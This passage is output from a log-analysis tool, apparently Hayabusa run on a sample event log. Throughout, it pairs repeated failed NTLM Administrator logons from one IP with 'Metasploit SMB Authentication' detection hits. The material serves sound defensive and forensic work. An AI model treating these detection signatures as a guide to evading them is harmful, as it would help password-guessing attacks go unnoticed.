11582016-09-20 01:50:08.397 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11592016-09-20 01:50:08.397 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11602016-09-20 01:50:08.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11612016-09-20 01:50:08.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11622016-09-20 01:50:08.513 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11632016-09-20 01:50:08.513 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11642016-09-20 01:50:08.545 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11652016-09-20 01:50:08.545 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11662016-09-20 01:50:08.576 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11672016-09-20 01:50:08.576 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11682016-09-20 01:50:08.611 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11692016-09-20 01:50:08.611 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11702016-09-20 01:50:08.646 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11712016-09-20 01:50:08.646 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11722016-09-20 01:50:08.693 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11732016-09-20 01:50:08.693 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11742016-09-20 01:50:08.735 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11752016-09-20 01:50:08.735 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11762016-09-20 01:50:08.769 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11772016-09-20 01:50:08.769 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11782016-09-20 01:50:08.804 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11792016-09-20 01:50:08.804 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11802016-09-20 01:50:08.839 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11812016-09-20 01:50:08.839 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11822016-09-20 01:50:08.883 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11832016-09-20 01:50:08.883 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11842016-09-20 01:50:08.916 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11852016-09-20 01:50:08.916 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11862016-09-20 01:50:08.955 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11872016-09-20 01:50:08.955 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11882016-09-20 01:50:08.992 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11892016-09-20 01:50:08.992 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11902016-09-20 01:50:09.028 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11912016-09-20 01:50:09.028 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11922016-09-20 01:50:09.071 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11932016-09-20 01:50:09.071 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11942016-09-20 01:50:09.108 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11952016-09-20 01:50:09.108 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11962016-09-20 01:50:09.144 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11972016-09-20 01:50:09.144 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11982016-09-20 01:50:09.183 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11992016-09-20 01:50:09.183 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12002016-09-20 01:50:09.219 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12012016-09-20 01:50:09.219 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12022016-09-20 01:50:09.255 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12032016-09-20 01:50:09.255 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12042016-09-20 01:50:09.291 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12052016-09-20 01:50:09.291 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12062016-09-20 01:50:09.336 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12072016-09-20 01:50:09.336 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12082016-09-20 01:50:09.364 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12092016-09-20 01:50:09.364 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12102016-09-20 01:50:09.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12112016-09-20 01:50:09.420 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12122016-09-20 01:50:09.455 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12132016-09-20 01:50:09.455 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12142016-09-20 01:50:09.500 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12152016-09-20 01:50:09.500 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12162016-09-20 01:50:09.544 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12172016-09-20 01:50:09.544 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12182016-09-20 01:50:09.587 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12192016-09-20 01:50:09.587 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12202016-09-20 01:50:09.631 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12212016-09-20 01:50:09.631 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12222016-09-20 01:50:09.686 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12232016-09-20 01:50:09.686 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12242016-09-20 01:50:09.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12252016-09-20 01:50:09.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12262016-09-20 01:50:09.760 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12272016-09-20 01:50:09.760 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12282016-09-20 01:50:09.797 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12292016-09-20 01:50:09.797 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12302016-09-20 01:50:09.840 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12312016-09-20 01:50:09.840 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12322016-09-20 01:50:09.876 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12332016-09-20 01:50:09.876 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12342016-09-20 01:50:09.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12352016-09-20 01:50:09.921 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12362016-09-20 01:50:09.968 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12372016-09-20 01:50:09.968 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12382016-09-20 01:50:10.016 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12392016-09-20 01:50:10.016 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12402016-09-20 01:50:10.061 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12412016-09-20 01:50:10.061 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12422016-09-20 01:50:10.156 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12432016-09-20 01:50:10.156 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12442016-09-20 01:50:10.191 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12452016-09-20 01:50:10.191 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12462016-09-20 01:50:10.222 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12472016-09-20 01:50:10.222 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12482016-09-20 01:50:10.263 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12492016-09-20 01:50:10.263 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12502016-09-20 01:50:10.311 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12512016-09-20 01:50:10.311 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12522016-09-20 01:50:10.344 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12532016-09-20 01:50:10.344 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
